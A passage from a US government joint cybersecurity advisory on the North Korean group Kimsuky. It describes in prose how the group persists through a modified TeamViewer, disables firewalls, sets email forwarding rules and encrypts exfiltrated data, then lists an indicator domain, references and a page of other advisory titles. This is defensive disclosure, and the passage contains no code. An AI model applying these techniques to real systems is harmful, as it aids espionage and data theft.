Kimsuky has used a modified TeamViewer client, version 5.0.9104, for Command and Control [TA0011] (Remote Access Software [T1219]). During the initial infection, the service “Remote Access Service” is created and adjusted to execute C:\Windows\System32\vcmon.exe
at system startup (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]). Every time vcmon.exe
is executed, it disables the firewall by zeroing out Registry values (Impair Defenses: Disable or Modify System Firewall [T1562.004]). The program then modifies the TeamViewer Registry settings by changing the TeamViewer
strings in TeamViewer components. The launcher then configures several Registry values, including SecurityPasswordAES
, that control how the remote access tool will work. The SecurityPasswordAES
Registry value represents a hash of the password used by a remote user to connect to TeamViewer Client (Use Alternate Authentication Material: Pass the Hash [T1550.002]). This way, the attackers set a pre-shared authentication value to have access to the TeamViewer Client. The attacker will then execute the TeamViewer client netsvcs.exe
.[58]
Kimsuky has been using a consistent format. In the URL used recently—express[.]php?op=1
—there appears to be an option range from 1 to 3.[59]
Exfiltration
Open-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email or through an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer (Exfiltration [TA0010]).
There was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky’s intention is to steal information, not to disrupt computer networks. Kimsuky’s preferred method for sending or receiving exfiltrated information is through email, with their malware on the victim machine encrypting the data before sending it to a C2 server (Archive Collected Data [T1560]). Kimsuky also sets up auto-forward rules within a victim’s email account (Email Collection: Email Forwarding Rule [T1114.003]).
Kimsuky also uses an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer to exfiltrate stolen data. The data is sent RSA-encrypted (Encrypted Channel: Symmetric Cryptography [T1573.001]). Kimsuky’s malware constructs an 1120-bit public key and uses it to encrypt the 117-bytes buffer. The resulting data file is saved in C:\Program Files\Common Files\System\Ole DB\
(Data Staged: Local Data Staging [T1074.001]).[60]
Mitigations
Indicators of Compromise
Kimsuky has used the domains listed in table 1 to carry out its objectives:
For a downloadable copy of IOCs, see AA20-301A.stix.
Table 1: Domains used by Kimsuky
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
member.daum.uniex[.]kr |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Table 2: Redacted domains used by Kimsuky
|
|
|
|
|
|
Contact Information
To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov.
This information is provided “as is” for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.
The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.
References
- [1] Netscout: Stolen Pencil Campaign Targets Academia
- [2] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries
- [3] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries
- [4] Netscout: Stolen Pencil Campaign Targets Academia
- [5] MITRE ATT&CK: Groups – Kimsuky
- [6] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities
- [7] MITRE ATT&CK: Groups – Kimsuky
- [8] CrowdStrike: 2020 Global Threat Report
- [9] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure
- [10] PwC: Tracking ‘Kimsuky’, the North Korea-based cyber espionage group: Part 2
- [11] CrowdStrike: 2020 Global Threat Report
- [12] Netscout: Stolen Pencil Campaign Targets Academia
- [13] MITRE ATT&CK: Groups – Kimsuky
- [14] Private Sector Partner
- [15] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries
- [16] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure
- [17] cyberscoop: North Korea could accelerate commercial espionage to meet Kim’s economic deadline
- [18] MITRE ATT&CK: Groups – Kimsuky
- [19] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries
- [20] MITRE ATT&CK: Groups – Kimsuky
- [21] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks
- [22] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks
- [23] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries
- [24] MITRE ATT&CK: Groups – Kimsuky
- [25] Palo Alto Networks Unit 42: BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat
- [26] McAfee: What is mshta, how can it be used and how to protect against it
- [27] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks
- [28] Netscout: Stolen Pencil Campaign Targets Academia
- [29] MITRE ATT&CK: Groups – Kimsuky
- [30] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks
- [31] Netscout: Stolen Pencil Campaign Targets Academia
- [32] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [33] Private Sector Partner
- [34] Private Sector Partner
- [35] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [36] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs
- [37] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs
- [38] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [39] MITRE ATT&CK: Groups – Kimsuky
- [40] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [41] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [42] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [43] MITRE ATT&CK: Groups – Kimsuky
- [44] McAfee: What is mshta, how can it be used and how to protect against it
- [45] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities
- [46] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [47] MITRE ATT&CK: Groups – Kimsuky
- [48] Detecting credential theft through memory access modelling with Microsoft Defender ATP
- [49] MITRE ATT&CK: Groups – Kimsuky
- [50] ZDNet: Cyber-espionage-group-uses-chrome-extension-to-infect-victims
- [51] ZDNet: Cyber-espionage-group-uses-chrome-extension-to-infect-victims
- [52] Netscout: Stolen Pencil Campaign Targets Academia
- [53] Netscout: Stolen Pencil Campaign Targets Academia
- [54] Private Sector Partner
- [55] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [56] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [57] Private Sector Partner
- [58] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [59] Private Sector Partner
- [60] Securelist: The “Kimsuky” Operation: A North Korean APT?
Revisions
- October 27, 2020: Initial Version
This product is provided subject to this Notification and this Privacy & Use policy.
AA20-296B: Iranian Advanced Persistent Threat Actors Threaten Election-Related Systems
Original release date: October 22, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are warning that Iranian advanced persistent threat (APT) actors are likely intent on influencing an…
AA20-296A: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets
Original release date: October 22, 2020SummaryThis joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor ta…
AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
Original release date: October 9, 2020SummaryThis joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor tec…
AA20-280A: Emotet Malware

Original release date: October 6, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
This product …
AA20-275A: Potential for China Cyber Response to Heightened U.S.–China Tensions
Original release date: October 1, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
In light of h…
AA20-266A: LokiBot Malware

Original release date: September 22, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise frameworks for all referenced threat actor techniques.
This prod…
AA20-259A: Iran-Based Threat Actor Exploits VPN Vulnerabilities
Original release date: September 15, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
This produ…
AA20-258A: Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity
Original release date: September 14, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources a…
AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity

Original release date: September 1, 2020SummaryThis joint advisory is the result of a collaborative research effort by the cybersecurity authorities of five nations: Australia,[1] Canada,[2] New Zealand,[3][4] the United Kingdom,[5] and the United Stat…
AA20-239A: FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks

Original release date: August 26, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
This joint ad…
AA20-227A: Phishing Emails Used to Deploy KONNI Malware
Original release date: August 14, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
The Cybersecu…
AA20-225A: Malicious Cyber Actor Spoofing COVID-19 Loan Relief Webpage via Phishing Emails

Original release date: August 12, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is currently tracking an unknown malicious cyber actor who is spoofing the Small Business Administration (SBA) COVID-19 loan relief webpage via phi…
AA20-209A: Potential Legacy Risk from Malware Targeting QNAP NAS Devices

Original release date: July 27, 2020SummaryThis is a joint alert from the United States Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).
CISA and NCSC are investigating a strain of…
AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902
Original release date: July 24, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this alert in response to recently disclosed exploits that target F5 BIG-IP devices that are vulnerable to CVE-2020-5902. F5 Networks, Inc…
AA20-205A: NSA and CISA Recommend Immediate Actions to Reduce Exposure Across Operational Technologies and Control Systems
Original release date: July 23, 2020SummaryNote: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise and ATT&CK for Industrial Control System…
AA20-198A: Malicious Cyber Actor Use of Network Tunneling and Spoofing to Obfuscate Geolocation

Original release date: July 16, 2020SummaryThis Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) and Pre-ATT&CK frameworks. See the MITRE ATT&CK for Enterprise and Pre-ATT&CK frameworks for r…
AA20-195A: Critical Vulnerability in SAP NetWeaver AS Java
Original release date: July 13, 2020SummaryOn July 13, 2020 EST, SAP released a security update to address a critical vulnerability, CVE-2020-6287, affecting the SAP NetWeaver Application Server (AS) Java component LM Configuration Wizard. An unauthent…
AA20-183A: Defending Against Malicious Cyber Activity Originating from Tor
Original release date: July 1, 2020SummaryThis advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) and Pre-ATT&CK framework. See the ATT&CK for Enterprise and Pre-ATT&CK frameworks for referenced thre…
AA20-183A: Defending Against Malicious Cyber Activity Originating from Tor
Original release date: July 1, 2020 | Last revised: July 2, 2020SummaryThis advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) and Pre-ATT&CK framework. See the ATT&CK for Enterprise and Pre-ATT&CK f…
AA20-182A: EINSTEIN Data Trends – 30-day Lookback
Original release date: June 30, 2020SummaryCybersecurity and Infrastructure Security Agency (CISA) analysts have compiled the top detection signatures that have been the most active over the month of May in our national Intrusion Detection System (IDS)…
AA20-182A: EINSTEIN Data Trends – 30-day Lookback
Original release date: June 30, 2020SummaryCybersecurity and Infrastructure Security Agency (CISA) analysts have compiled the top detection signatures that have been the most active over the month of May in our national Intrusion Detection System (IDS)…
AA20-133A: Top 10 Routinely Exploited Vulnerabilities
Original release date: May 12, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the broader U.S. Government are providing this technical guidance to advise IT security professionals …
AA20-133A: Top 10 Routinely Exploited Vulnerabilities
Original release date: May 12, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the broader U.S. Government are providing this technical guidance to advise IT security professionals …
AA20-126A: APT Groups Target Healthcare and Essential Services
Original release date: May 5, 2020SummaryThis is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).
CISA an…
AA20-126A: APT Groups Target Healthcare and Essential Services
Original release date: May 5, 2020SummaryThis is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).
CISA an…
AA20-120A: Microsoft Office 365 Security Recommendations
Original release date: April 29, 2020SummaryAs organizations adapt or change their enterprise collaboration capabilities to meet “telework” requirements, many organizations are migrating to Microsoft Office 365 (O365) and other cloud collaboration serv…
AA20-120A: Microsoft Office 365 Security Recommendations
Original release date: April 29, 2020SummaryAs organizations adapt or change their enterprise collaboration capabilities to meet “telework” requirements, many organizations are migrating to Microsoft Office 365 (O365) and other cloud collaboration serv…
AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching

Original release date: April 16, 2020 | Last revised: June 30, 2020SummaryNote: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all refer…
AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching

Original release date: April 16, 2020SummaryNote: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques …
AA20-106A: Guidance on the North Korean Cyber Threat
Original release date: April 15, 2020SummaryThe U.S. Departments of State, the Treasury, and Homeland Security, and the Federal Bureau of Investigation are issuing this advisory as a comprehensive resource on the North Korean cyber threat for the inter…
AA20-106A: Guidance on the North Korean Cyber Threat
Original release date: April 15, 2020 | Last revised: June 23, 2020SummaryThe U.S. Departments of State, the Treasury, and Homeland Security, and the Federal Bureau of Investigation are issuing this advisory as a comprehensive resource on the North Kor…
AA20-099A: COVID-19 Exploited by Malicious Cyber Actors

Original release date: April 8, 2020SummaryThis is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).
This …
AA20-099A: COVID-19 Exploited by Malicious Cyber Actors

Original release date: April 8, 2020SummaryThis is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).
This …
AA20-073A: Enterprise VPN Security
Original release date: March 13, 2020 | Last revised: April 15, 2020SummaryAs organizations prepare for possible impacts of Coronavirus Disease 2019 (COVID-19), many may consider alternate workplace options for their employees. Remote work options—or t…
AA20-073A: Enterprise VPN Security
Original release date: March 13, 2020SummaryAs organizations prepare for possible impacts of Coronavirus Disease 2019 (COVID-19), many may consider alternate workplace options for their employees. Remote work options—or telework—require an enterprise v…
AA20-049A: Ransomware Impacting Pipeline Operations
Original release date: February 18, 2020 | Last revised: June 30, 2020SummaryNote: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework. See the MITRE ATT&CK for Enterprise and ATT&CK …
AA20-049A: Ransomware Impacting Pipeline Operations
Original release date: February 18, 2020SummaryNote: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework. See the MITRE ATT&CK for Enterprise and ATT&CK for Industrial Control Systems…
AA20-031A: Detecting Citrix CVE-2019-19781
Original release date: January 31, 2020SummaryUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[1]
Tho…
AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP
Original release date: January 20, 2020<br/><h3>Summary</h3><p>On January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0 to address CVE-2019-…
AA20-014A: Critical Vulnerabilities in Microsoft Windows Operating Systems
Original release date: January 14, 2020SummaryNew vulnerabilities are continually emerging, but the best defense against attackers exploiting patched vulnerabilities is simple: keep software up to date. Timely patching is one of the most efficient and …
AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability
Original release date: January 10, 2020SummaryUnpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix a remote code execution (RCE) vulnerabilit…
AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability
Original release date: January 10, 2020SummaryUnpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix a remote code execution (RCE) vulnerabilit…
AA20-006A: Potential for Iranian Cyber Response to U.S. Military Strike in Baghdad
Original release date: January 6, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is sharing the following information with the cybersecurity community as a primer for assisting in the protection of our Nation’s critical infrastr…
AA19-339A: Dridex Malware
Original release date: December 5, 2019SummaryThis Alert is the result of recent collaboration between the Department of the Treasury Financial Sector Cyber Information Group (CIG) and the Department of the Treasury’s Financial Crimes Enforcement Netwo…
AA19-339A: Dridex Malware
Original release date: December 5, 2019SummaryThis Alert is the result of recent collaboration between the Department of the Treasury Financial Sector Cyber Information Group (CIG) and the Department of the Treasury’s Financial Crimes Enforcement Netwo…
AA19-290A: Microsoft Ending Support for Windows 7 and Windows Server 2008 R2
Original release date: October 17, 2019SummaryOn January 14, 2020, Microsoft will end extended support for their Windows 7 and Windows Server 2008 R2 operating systems.[1] After this date, these products will no longer receive free technical support, o…
AA19-168A: Microsoft Operating Systems BlueKeep Vulnerability
Original release date: June 17, 2019
Summary
The Cybersecurity and Infrastructure Security Agency (CISA) is issuing this Activity Alert to provide information on a vulnerability, known as “BlueKeep,” that exists in the following Micr…
AA19-168A: Microsoft Operating Systems BlueKeep Vulnerability
Original release date: June 17, 2019SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this Activity Alert to provide information on a vulnerability, known as “BlueKeep,” that exists in the following Microsoft Windows Operati…
AA19-122A: New Exploits for Unsecure SAP Systems
Original release date: May 02, 2019 | Last revised: May 03, 2019
Summary
The Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure confi…
AA19-122A: New Exploits for Unsecure SAP Systems
Original release date: May 2, 2019 | Last revised: May 3, 2019SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure configurations of SAP compon…
AA19-024A: DNS Infrastructure Hijacking Campaign
Original release date: January 24, 2019 | Last revised: February 13, 2019SummaryThe National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain N…
AA19-024A: DNS Infrastructure Hijacking Campaign
Original release date: January 24, 2019 | Last revised: February 13, 2019
Summary
The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware…
AA18-337A: SamSam Ransomware
Original release date: December 3, 2018SummaryThe Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the Federal Bureau of Investigation (FBI) are issuing this activity alert to inform compute…
AA18-337A: SamSam Ransomware
Original release date: December 03, 2018
Summary
The Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the Federal Bureau of Investigation (FBI) are issuing this activity a…
TA18-331A: 3ve – Major Online Ad Fraud Operation
Original release date: November 27, 2018Systems AffectedMicrosoft WindowsOverviewThis joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). DHS and …
TA18-331A: 3ve – Major Online Ad Fraud Operation
Original release date: November 27, 2018
Systems Affected
Microsoft Windows
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federa…
AA18-284A: Publicly Available Tools Seen in Cyber Incidents Worldwide
Original release date: October 11, 2018SummaryThis report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5]In it we highlight …
AA18-284A: Publicly Available Tools Seen in Cyber Incidents Worldwide
Original release date: October 11, 2018
Summary
This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][…
TA18-276B: Advanced Persistent Threat Activity Exploiting Managed Service Providers
Original release date: October 3, 2018Systems AffectedNetwork SystemsOverviewThe National Cybersecurity and Communications Integration Center (NCCIC) is aware of ongoing APT actor activity attempting to infiltrate the networks of global managed service…
TA18-276A: Using Rigorous Credential Control to Mitigate Trusted Network Exploitation
Original release date: October 3, 2018Systems AffectedNetwork SystemsOverviewThis technical alert addresses the exploitation of trusted network relationships and the subsequent illicit use of legitimate credentials by Advanced Persistent Threat (APT) a…
TA18-276B: Advanced Persistent Threat Activity Exploiting Managed Service Providers
Original release date: October 03, 2018
Systems Affected
Network Systems
Overview
The National Cybersecurity and Communications Integration Center (NCCIC) is aware of ongoing APT actor activity attempting to infiltr…
TA18-276A: Using Rigorous Credential Control to Mitigate Trusted Network Exploitation
Original release date: October 03, 2018
Systems Affected
Network Systems
Overview
This technical alert addresses the exploitation of trusted network relationships and the subsequent illicit use of legitimate credent…
TA18-275A: HIDDEN COBRA – FASTCash Campaign

Original release date: October 2, 2018 | Last revised: December 21, 2018Systems AffectedRetail Payment SystemsOverviewThis joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS), the Department of…
TA18-275A: HIDDEN COBRA – FASTCash Campaign

Original release date: October 02, 2018 | Last revised: December 21, 2018
Systems Affected
Retail Payment Systems
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of …
TA18-201A: Emotet Malware

Original release date: July 20, 2018Systems AffectedNetwork SystemsOverviewEmotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet continues to be among the most costly and dest…
TA18-201A: Emotet Malware

Original release date: July 20, 2018
Systems Affected
Network Systems
Overview
Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet conti…
TA18-149A: HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
Original release date: May 29, 2018 | Last revised: May 31, 2018
Systems Affected
Network systems
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Securit…
TA18-145A: Cyber Actors Target Home and Office Routers and Networked Devices Worldwide
Original release date: May 25, 2018 | Last revised: June 07, 2018
Systems Affected
Small office/home office (SOHO) routersNetworked devicesNetwork-attached storage (NAS) devices
Overview
Cybersecurity researchers ha…